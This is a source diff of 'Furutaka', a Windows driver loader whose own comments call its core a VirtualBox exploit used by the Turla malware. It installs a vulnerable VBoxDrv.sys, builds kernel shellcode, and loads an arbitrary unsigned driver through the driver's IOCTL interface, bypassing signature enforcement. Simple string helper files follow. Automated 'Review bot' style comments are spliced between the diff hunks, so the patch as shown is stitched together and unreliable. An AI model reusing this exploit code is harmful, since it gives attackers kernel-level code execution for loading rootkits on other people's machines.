+* +*/ +void TDLResolveKernelImport( + ULONG_PTR Image, + ULONG_PTR KernelImage, + ULONG_PTR KernelBase + ) +{ + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, *nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; + + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; + + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; + + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + + for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } +} + +/* +* TDLExploit +* +* Purpose: +* +* VirtualBox exploit used by WinNT/Turla. 
+* +*/ +void TDLExploit( + LPVOID Shellcode, + ULONG CodeSize + ) +{ + SUPCOOKIE Cookie; + SUPLDROPEN OpenLdr; + DWORD bytesIO = 0; + RTR0PTR ImageBase = NULL; + ULONG_PTR paramOut; + PSUPLDRLOAD pLoadTask = NULL; + SUPSETVMFORFAST vmFast; + SUPLDRFREE ldrFree; + SIZE_T memIO; + WCHAR text[256]; + + while (g_hVBox != INVALID_HANDLE_VALUE) { + RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); + Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; + Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; + Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; + Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + Cookie.Hdr.rc = 0; + Cookie.u.In.u32ReqVersion = 0; + Cookie.u.In.u32MinVersion = 0x00070002; + RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, + &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, + SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); + break; + } + + RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); + OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; + OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; + OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + OpenLdr.Hdr.rc = 0; + OpenLdr.u.In.cbImage = CodeSize; + RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); + u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + ImageBase = OpenLdr.u.Out.pvImageBase; + + memIO = PAGE_SIZE + CodeSize; + 
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + if (pLoadTask == NULL) + break; + + pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + pLoadTask->Hdr.cbIn = + (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; + pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; + pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; + pLoadTask->Hdr.rc = 0; + pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; + pLoadTask->u.In.pvImageBase = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; + RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); + pLoadTask->u.In.cbImage = CodeSize; + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, + pLoadTask, pLoadTask->Hdr.cbIn, + pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase, _strend(text)); + _strcat(text, TEXT(", size = 0x")); + ultohex(CodeSize, _strend(text)); + + _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); + vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + vmFast.Hdr.rc = 0; + vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; + vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; + vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; + + if (!DeviceIoControl(g_hVBox, 
SUP_IOCTL_SET_VM_FOR_FAST, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); + } + + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); + + paramOut = 0; + DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, + NULL, 0, + ¶mOut, sizeof(paramOut), &bytesIO, NULL); + + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); + + RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); + ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; + ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; + ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + ldrFree.Hdr.rc = 0; + ldrFree.u.In.pvImageBase = ImageBase; + + DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); + + break; + } + + if (pLoadTask != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); + } + + if (g_hVBox != INVALID_HANDLE_VALUE) { + CloseHandle(g_hVBox); + g_hVBox = INVALID_HANDLE_VALUE; + } +} + +/* +* TDLMapDriver +* +* Purpose: +* +* Build shellcode and execute exploit. 
+* +*/ +UINT TDLMapDriver( + LPWSTR lpDriverFullName + ) +{ + UINT result = (UINT)-1; + ULONG isz; + SIZE_T memIO; + ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + HMODULE Image = NULL; + PIMAGE_NT_HEADERS FileHeader; + PBYTE Buffer = NULL; + UNICODE_STRING uStr; + ANSI_STRING routineName; + NTSTATUS status; + WCHAR text[256]; + + KernelBase = supGetNtOsBase(); + while (KernelBase != 0) { + + _strcpy(text, TEXT("Ldr: Kernel base = 0x")); + u64tohex(KernelBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + + RtlSecureZeroMemory(&uStr, sizeof(uStr)); + RtlInitUnicodeString(&uStr, lpDriverFullName); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); + if ((!NT_SUCCESS(status)) || (Image == NULL)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); + u64tohex((ULONG_PTR)Image, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + FileHeader = RtlImageNtHeader(Image); + if (FileHeader == NULL) + break; + + isz = FileHeader->OptionalHeader.SizeOfImage; + + cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + + RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); + if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); + u64tohex(KernelImage, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "ExAllocatePoolWithTag"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); + if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, 
ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); + u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + memIO = isz + PAGE_SIZE; + NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (Buffer == NULL) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); + u64tohex((ULONG_PTR)Buffer, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + // mov rcx, ExAllocatePoolWithTag + // mov rdx, PsCreateSystemThread + + Buffer[0x00] = 0x48; // mov rcx, xxxxx + Buffer[0x01] = 0xb9; + *((PULONG_PTR)&Buffer[2]) = + KernelBase + (xExAllocatePoolWithTag - KernelImage); + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); + + RtlCopyMemory(Buffer + 0x14, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + RtlCopyMemory(Buffer + scDataOffset, Image, isz); + + cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); + TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + + 
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); + TDLExploit(Buffer, isz + PAGE_SIZE); + result = 0; + break; + } + + if (Buffer != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); + } + + return result; +} + +/* +* TDLStartVulnerableDriver +* +* Purpose: +* +* Load vulnerable virtualbox driver and return handle for it device. +* +*/ +HANDLE TDLStartVulnerableDriver( + VOID + ) +{ + PBYTE DrvBuffer; + ULONG DataSize = 0, bytesIO; + HANDLE hDevice = INVALID_HANDLE_VALUE; + WCHAR szDriverFileName[MAX_PATH * 2]; + SC_HANDLE schSCManager = NULL; + LPWSTR msg; + + DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); + while (DrvBuffer != NULL) { + + //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. + RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); + if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { + + cuiPrintText(g_ConOut, + TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), + g_ConsoleOutput, TRUE); + + break; + } + + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error opening SCM database"), + g_ConsoleOutput, TRUE); + + break; + } + + //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive + if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), + g_ConsoleOutput, TRUE); + + if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetAdp driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetLwf driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: 
VBoxUSBMon driver unloaded"), + g_ConsoleOutput, TRUE); + } + Sleep(1000); + if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxDrv driver unloaded"), + g_ConsoleOutput, TRUE); + } + } + + //if vbox installed backup it driver, do it before dropping our + if (g_VBoxInstalled) { + if (supBackupVBoxDrv(FALSE) == FALSE) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error while doing VirtualBox driver backup"), + g_ConsoleOutput, TRUE); + + break; + } + } + + //drop our vboxdrv version + _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); + bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, + (SIZE_T)DataSize, FALSE, FALSE); + + if (bytesIO != DataSize) { + + cuiPrintText(g_ConOut, + TEXT("Ldr: Error writing VirtualBox on disk"), + g_ConsoleOutput, TRUE); + + break; + } + + //if vbox not found in system install driver in scm + if (g_VBoxInstalled == FALSE) { + scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); + } + + //run driver + if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) { + + if (scmOpenDevice(VBoxDrvSvc, &hDevice)) + msg = TEXT("SCM: Vulnerable driver loaded and opened"); + else + msg = TEXT("SCM: Driver device open failure"); + + } + else { + msg = TEXT("SCM: Vulnerable driver load failure"); + } + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + break; + } + + //post cleanup + if (schSCManager != NULL) { + CloseServiceHandle(schSCManager); + } + return hDevice; +} + +/* +* TDLStopVulnerableDriver +* +* Purpose: +* +* Unload previously loaded vulnerable driver. If VirtualBox installed - restore original driver. 
+* +*/ +void TDLStopVulnerableDriver( + VOID + ) +{ + SC_HANDLE schSCManager; + LPWSTR msg; + UNICODE_STRING uStr; + OBJECT_ATTRIBUTES ObjectAttributes; + + cuiPrintText(g_ConOut, + TEXT("SCM: Unloading vulnerable driver"), + g_ConsoleOutput, TRUE); + + if (g_hVBox != INVALID_HANDLE_VALUE) + CloseHandle(g_hVBox); + + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("SCM: Cannot open database, unable unload driver"), + g_ConsoleOutput, TRUE); + return; + } + + + //stop driver in any case + if (scmStopDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Vulnerable driver successfully unloaded"); + else + msg = TEXT("SCM: Unexpected error while unloading driver"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + + //if VBox not installed - remove from scm database and delete file + if (g_VBoxInstalled == FALSE) { + + if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Driver entry removed from registry"); + else + msg = TEXT("SCM: Error removing driver entry from registry"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + + RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); + InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); + if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) + msg = TEXT("Ldr: Driver file removed"); + else + msg = TEXT("Ldr: Error removing driver file"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + + } + else { + //VBox software present, restore original driver and exit + if (supBackupVBoxDrv(TRUE)) + msg = TEXT("Ldr: Original driver restored"); + else + msg = TEXT("Ldr: Unexpected error while restoring original driver"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + CloseServiceHandle(schSCManager); +} + +/* +* TDLProcessCommandLine +* +* Purpose: +* +* Extract target driver from command line and continue with it load. 
+* +*/ +UINT TDLProcessCommandLine( + LPWSTR lpCommandLine + ) +{ + UINT retVal = (UINT)-1; + WCHAR szInputFile[MAX_PATH + 1]; + ULONG c; + + //input file + c = 0; + RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); + GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); + if (c == 0) { + cuiPrintText(g_ConOut, + T_LOADERUSAGE, + g_ConsoleOutput, FALSE); + return retVal; + } + + if (PathFileExists(szInputFile)) { + g_hVBox = TDLStartVulnerableDriver(); + if (g_hVBox != INVALID_HANDLE_VALUE) { + retVal = TDLMapDriver(szInputFile); + TDLStopVulnerableDriver(); + } + } + else { + cuiPrintText(g_ConOut, + TEXT("Ldr: Input file not found"), + g_ConsoleOutput, FALSE); + } + return retVal; +} + +/* +* TDLMain +* +* Purpose: +* +* Loader main. +* +*/ +void TDLMain() +{ + + BOOL cond = FALSE; + UINT uResult = 0; + DWORD dwTemp; + LONG x; + OSVERSIONINFOW osv; + WCHAR text[256]; + + __security_init_cookie(); + + do { + g_hInstance = GetModuleHandle(NULL); + + g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); + if (g_ConOut == INVALID_HANDLE_VALUE) { + uResult = (UINT)-1; + break; + } + + g_ConsoleOutput = TRUE; + if (!GetConsoleMode(g_ConOut, &dwTemp)) { + g_ConsoleOutput = FALSE; + } + + SetConsoleTitle(T_LOADERTITLE); + SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); + if (g_ConsoleOutput == FALSE) { + WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL); + } + + cuiPrintText(g_ConOut, + T_LOADERINTRO, + g_ConsoleOutput, TRUE); + + + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + cuiPrintText(g_ConOut, + T_LOADERRUN, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } + + //check version first + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + cuiPrintText(g_ConOut, + T_LOADERUNSUP, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } + + _strcpy(text, 
TEXT("Ldr: Windows v"));
+ ultostr(osv.dwMajorVersion, _strend(text));
+ _strcat(text, TEXT("."));
+ ultostr(osv.dwMinorVersion, _strend(text));
+ _strcat(text, TEXT(" build "));
+ ultostr(osv.dwBuildNumber, _strend(text));
+ cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
+
+ g_VBoxInstalled = TDLVBoxInstalled();
+ if (g_VBoxInstalled) {
+ cuiPrintText(g_ConOut,
+ TEXT("Ldr: Warning VirtualBox software installed, conficts possible"),
+ g_ConsoleOutput, TRUE);
+ }
+
+ uResult = TDLProcessCommandLine(GetCommandLine());
+
+ } while (cond);
+
+ InterlockedDecrement((PLONG)&g_lApplicationInstances);
+ ExitProcess(uResult);
+}
diff --git a/Source/Furutaka/minirtl/_strcat.c b/Source/Furutaka/minirtl/_strcat.c
new file mode 100644
index 0000000..eb3c136
--- /dev/null
+++ b/Source/Furutaka/minirtl/_strcat.c
@@ -0,0 +1,37 @@
+#include "rtltypes.h"
+
+char *_strcat_a(char *dest, const char *src)
+{
+ if ( (dest==0) || (src==0) )
+ return dest;
+
+ while ( *dest!=0 )
+ dest++;
+
+ while ( *src!=0 ) {
+ *dest = *src;
+ dest++;
+ src++;
+ }
+
+ *dest = 0;
+ return dest;
+}
+
+wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
+{
+ if ( (dest==0) || (src==0) )
+ return dest;
+
+ while ( *dest!=0 )
+ dest++;
+
+ while ( *src!=0 ) {
+ *dest = *src;
+ dest++;
+ src++;
+ }
+
+ *dest = 0;
+ return dest;
+}
diff --git a/Source/Furutaka/minirtl/_strcmpi.c b/Source/Furutaka/minirtl/_strcmpi.c
new file mode 100644
index 0000000..5f6656b
--- /dev/null
+++ b/Source/Furutaka/minirtl/_strcmpi.c
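Review bot: In TDLVBoxInstalled the `lRet` returned by `RegOpenKeyEx` is stored and never tested; the function infers success from `hKey != NULL`, which depends on the API leaving the out-parameter untouched on failure, so `bPresent = (lRet == ERROR_SUCCESS);` states the check directly and gives `lRet` a purpose. TDLRelocImage is defined but never called anywhere in main.c, so in this commit it is dead code and should either be removed or carry a comment saying why it is kept. In TDLStopVulnerableDriver the `CloseHandle(g_hVBox)` path leaves the global holding the closed value; TDLExploit resets it with `g_hVBox = INVALID_HANDLE_VALUE;` after closing, and the same line belongs here so a later test of the global cannot act on a stale handle. The `do { ... } while (cond)` in TDLMain with `cond` fixed at FALSE is a single-pass scope used for `break`; a comment such as `// single-pass block: break exits to the cleanup below` would spare the next reader the search for where cond changes.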
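Review bot: `_strcat_a` and `_strcat_w` return a pointer to the new terminator on success but the original `dest` on the NULL early exit, so the return value means two different things and neither matches the standard `strcat` contract of returning the start of `dest`; main.c ignores the return and uses `_strend` when it needs the end pointer, so the deviation is easy to misuse elsewhere. Document it on both definitions with `/* returns a pointer to the terminating NUL of dest (unlike strcat), or dest unchanged when either argument is NULL */`, or return `dest` from both paths if the standard contract is intended.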
@@ -0,0 +1,47 @@
+#include "rtltypes.h"
+
+int _strcmpi_a(const char *s1, const char *s2)
+{
+ char c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ do {
+ c1 = locase_a(*s1);
+ c2 = locase_a(*s2);
+ s1++;
+ s2++;
+ } while ( (c1 != 0) && (c1 == c2) );
+
+ return (int)(c1 - c2);
+}
+
+int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
+{
+ wchar_t c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ do {
+ c1 = locase_w(*s1);
+ c2 = locase_w(*s2);
+ s1++;
+ s2++;
+ } while ( (c1 != 0) && (c1 == c2) );
+
+ return (int)(c1 - c2);
+}
diff --git a/Source/Furutaka/minirtl/_strcpy.c b/Source/Furutaka/minirtl/_strcpy.c
new file mode 100644
index 0000000..bad5c90
--- /dev/null
+++ b/Source/Furutaka/minirtl/_strcpy.c
@@ -0,0 +1,43 @@
+#include "rtltypes.h"
+
+char *_strcpy_a(char *dest, const char *src)
+{
+ char *p;
+
+ if ( (dest==0) || (src==0) )
+ return dest;
+
+ if (dest == src)
+ return dest;
+
+ p = dest;
+ while ( *src!=0 ) {
+ *p = *src;
+ p++;
+ src++;
+ }
+
+ *p = 0;
+ return dest;
+}
+
+wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
+{
+ wchar_t *p;
+
+ if ((dest == 0) || (src == 0))
+ return dest;
+
+ if (dest == src)
+ return dest;
+
+ p = dest;
+ while ( *src!=0 ) {
+ *p = *src;
+ p++;
+ src++;
+ }
+
+ *p = 0;
+ return dest;
+}
diff --git a/Source/Furutaka/minirtl/_strend.c b/Source/Furutaka/minirtl/_strend.c
new file mode 100644
index 0000000..a4d4b6a
--- /dev/null
+++ b/Source/Furutaka/minirtl/_strend.c
@@ -0,0 +1,23 @@
+#include "rtltypes.h"
+
+char *_strend_a(const char *s)
+{
+ if ( s==0 )
+ return 0;
+
+ while ( *s!=0 )
+ s++;
+
+ return (char *)s;
+}
+
+wchar_t *_strend_w(const wchar_t *s)
+{
+ if ( s==0 )
+ return 0;
+
+ while ( *s!=0 )
+ s++;
+
+ return (wchar_t *)s;
+}
diff --git a/Source/Furutaka/minirtl/_strlen.c b/Source/Furutaka/minirtl/_strlen.c
new file mode 100644
index 0000000..1feda9e
--- /dev/null
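Review bot: The case folding in `_strcmpi_a`/`_strcmpi_w` is whatever `locase_a`/`locase_w` provide, and those only map ASCII `'A'..'Z'`, so letters outside that range compare case-sensitively; `_strncmpi_a`/`_strncmpi_w` in _strncmpi.c share this. In the `_a` variants `c1 - c2` is computed on plain `char`, so the ordering of bytes at or above 0x80 depends on the target's `char` signedness. The NULL handling (a NULL `s1` sorts before any string, a NULL `s2` after, two NULLs compare equal) is an extension of the usual contract that is nowhere stated. Suggest a comment on each: `/* Case-insensitive compare, ASCII letters only. NULL is ordered before any non-NULL string. Returns <0, 0 or >0. */`.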
+++ b/Source/Furutaka/minirtl/_strlen.c
@@ -0,0 +1,27 @@
+#include "rtltypes.h"
+
+size_t _strlen_a(const char *s)
+{
+ char *s0 = (char *)s;
+
+ if ( s==0 )
+ return 0;
+
+ while ( *s!=0 )
+ s++;
+
+ return (s-s0);
+}
+
+size_t _strlen_w(const wchar_t *s)
+{
+ wchar_t *s0 = (wchar_t *)s;
+
+ if ( s==0 )
+ return 0;
+
+ while ( *s!=0 )
+ s++;
+
+ return (s-s0);
+}
diff --git a/Source/Furutaka/minirtl/_strncmpi.c b/Source/Furutaka/minirtl/_strncmpi.c
new file mode 100644
index 0000000..ddbe8b8
--- /dev/null
+++ b/Source/Furutaka/minirtl/_strncmpi.c
@@ -0,0 +1,55 @@
+#include "rtltypes.h"
+
+int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
+{
+ char c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ if ( cchars==0 )
+ return 0;
+
+ do {
+ c1 = locase_a(*s1);
+ c2 = locase_a(*s2);
+ s1++;
+ s2++;
+ cchars--;
+ } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
+
+ return (int)(c1 - c2);
+}
+
+int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
+{
+ wchar_t c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
